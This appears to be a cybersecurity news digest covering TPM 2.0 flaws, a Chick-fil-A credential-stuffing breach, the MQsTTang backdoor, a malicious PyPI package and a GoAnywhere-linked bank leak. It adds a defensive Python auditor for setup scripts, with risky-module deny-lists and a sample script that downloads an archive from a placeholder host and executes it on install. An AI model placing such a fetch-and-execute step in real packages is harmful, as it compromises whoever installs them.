Hackerzhome

Cybersecurity news all over the world

HACKERZHOME NEWS

March 3, 2023

Friday

Billions of IoT and enterprise devices are at risk due to new flaws in the TPM 2.0 library.

The Trusted Platform Module (TPM) 2.0 reference library specification has been found to contain two critical security flaws that could result in data exposure or privilege escalation.


One of the vulnerabilities, CVE-2023-1017, is an out-of-bounds write, while the other, CVE-2023-1018, is an out-of-bounds read. Security firm Quarkslab is credited with finding and reporting the problems in November 2022.


The weaknesses, according to Quarkslab, can affect large tech vendors, businesses that use enterprise computers, servers, IoT devices, and embedded systems with a TPM, and “might harm Billions of devices.”


TPM is a hardware-based solution (i.e., a crypto-processor) created to offer secure cryptographic operations and physical security measures to thwart hacking attempts.


The TCG consortium pointed out that the flaws are caused by a lack of crucial length checks, resulting in buffer overflows that could open the door for the disclosure of private local information or the escalation of privileges.


To fix the bugs and reduce supply chain risks, users are advised to install the updates made available by TCG and other manufacturers.


Accounts were hacked in a months-long "automated" attack, according to Chick-fil-A.

Chick-fil-A, an American fast food company, has acknowledged that customers' accounts were compromised in a months-long credential stuffing attack, giving threat actors access to personal data and the ability to use saved reward balances.

Chick-fil-A created a support page at the time with instructions for customers on what to do if they see strange behavior on their accounts.

These accounts were sold for amounts between $2 and $200, depending on the rewards account balance and related payment options.

Customers who were affected by the breach are being warned by the fast food chain that threat actors who gained access to their accounts would also have had access to their name, email address, Chick-fil-A One membership number, mobile pay number, QR code, masked credit/debit card number, and the amount of Chick-fil-A credit (such as the balance of an e-gift card) on their account (if any).

The details could have included the last four digits of credit cards, phone numbers, physical addresses, and birthdays for some clients.

Following the hack, Chick-fil-A required customers to change their passwords, froze money in their accounts, and deleted any payment information that had been saved.


Chinese hackers use the new MQsTTang backdoor to attack European entities.

As part of an ongoing social engineering campaign that started in January 2023, the China-aligned Mustang Panda actor has been observed using a previously unknown custom backdoor named MQsTTang.

In the wake of Russia’s all-out invasion of Ukraine last year, attack chains mounted by the group have increasingly targeted European entities.

The victimology of the new campaign is unclear, although a cybersecurity firm in Slovakia said that the decoy filenames are consistent with the group’s earlier campaigns that targeted European political organizations.

However, ESET also noted attacks against unidentified targets in Australia, Taiwan, and Bulgaria, indicating a concentration on Europe and Asia.

Using a PlugX variant called Hodur and a Google Drive uploader tool, Avast revealed another set of attacks in December 2022 that were directed at political NGOs and government organizations in Myanmar and resulted in the exfiltration of sensitive data, including email dumps, files, court transcripts, interrogation reports, and meeting transcripts.

Also, a Go-based trojan named JSX and a sophisticated backdoor known as HT3 have been discovered on an FTP server connected to the threat actor.

These tools are all used to spread malware to affected devices and include a number of previously unknown capabilities.

Fully-Featured Data Stealer and Trojan Found in Python Package on PyPI, According to Experts


A malicious Python package uploaded to the Python Package Index (PyPI) was found to contain a remote access trojan and a fully functional information stealer.

Kroll’s Cyber Threat Intelligence team discovered the package, colorfool, and the company has named the malware Color-Blind.

Similar to other malicious Python modules found in recent months, this one hides its code in the setup script, which points to a ZIP archive payload hosted on the Discord platform.

The file includes a Python script (code.py) with various modules built to steal cookies, record keystrokes, and even disable security software.

The usage of Cloudflare tunnels is similar to another attack, which used six bogus packages to disseminate a stealer-cum-RAT known as poweRAT, which was made public by Phylum last month.

The malware is packed with features and is capable of gathering passwords, shutting down programs, taking screenshots, logging keystrokes, opening arbitrary websites in a browser, executing instructions, grabbing information from cryptocurrency wallets, and even spying on victims via the web camera.
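Because the malicious code sits in the setup script, that file can be reviewed statically before a package is installed. The following is an added example, not code from Kroll or from the package: it parses a setup script with Python's `ast` module and reports risky imports, dynamic-execution calls and embedded URLs. The deny-lists, function names and both sample scripts are constructed assumptions.

```python
import ast
import re

# Assumed deny-lists for this example: modules and builtins a setup script rarely needs.
RISKY_MODULES = {"urllib", "requests", "socket", "subprocess", "zipfile", "base64", "ctypes"}
RISKY_CALLS = {"exec", "eval", "compile", "__import__"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

def audit_setup_script(source):
    """Return sorted (line, finding) tuples for risky constructs; the code is never run."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        names = []
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        for name in names:
            root = name.split(".")[0]
            if root in RISKY_MODULES:
                findings.add((node.lineno, f"import:{root}"))
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in RISKY_CALLS:
                findings.add((node.lineno, f"call:{node.func.id}"))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.add((node.lineno, f"url:{url}"))
    return sorted(findings)

def is_suspicious(findings):
    """A URL alone is normal package metadata; escalate only on risky imports or calls."""
    return any(kind.startswith(("import:", "call:")) for _, kind in findings)

# Constructed samples: an ordinary setup script and one that fetches an archive on install.
BENIGN_SETUP = '''from setuptools import setup
setup(name="demo", version="1.0", url="https://example.org/demo")
'''
SUSPICIOUS_SETUP = '''from setuptools import setup
import urllib.request, zipfile
urllib.request.urlretrieve("https://cdn.example.invalid/placeholder.zip", "p.zip")
zipfile.ZipFile("p.zip").extractall("p")
exec(open("p/code.py").read())
setup(name="demo", version="1.0")
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        report = audit_setup_script(src)
        print(label, is_suspicious(report), report)
```

Static checks like this are a triage aid: obfuscated or indirectly invoked code can evade them, so flagged packages still need manual review in an isolated environment.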

After the compromise of GoAnywhere MFT, Hatch Bank reveals a data leak.

Hackers stole the personal data of nearly 140,000 users from the company’s Fortra GoAnywhere MFT secure file-sharing platform, according to Hatch Bank, a fintech banking platform.

A financial technology company called Hatch Bank enables small businesses to use other financial institutions’ banking services.

Hatch claims that after reviewing the stolen data, they discovered that the intruders had taken the names and social security numbers of the victims.

The bank also stated that it is giving impacted people free access to credit monitoring services for a full year.

The ransomware group claims that they stole data over a ten-day period using Fortra’s GoAnywhere MFT secure file-sharing platform’s zero-day vulnerability.

The vulnerability, which is now identified as CVE-2023-0669, allows remote threat actors to access systems through remote code execution.

After finding that the vulnerability was being actively exploited in attacks, GoAnywhere informed its clients of it in the first few days of February.
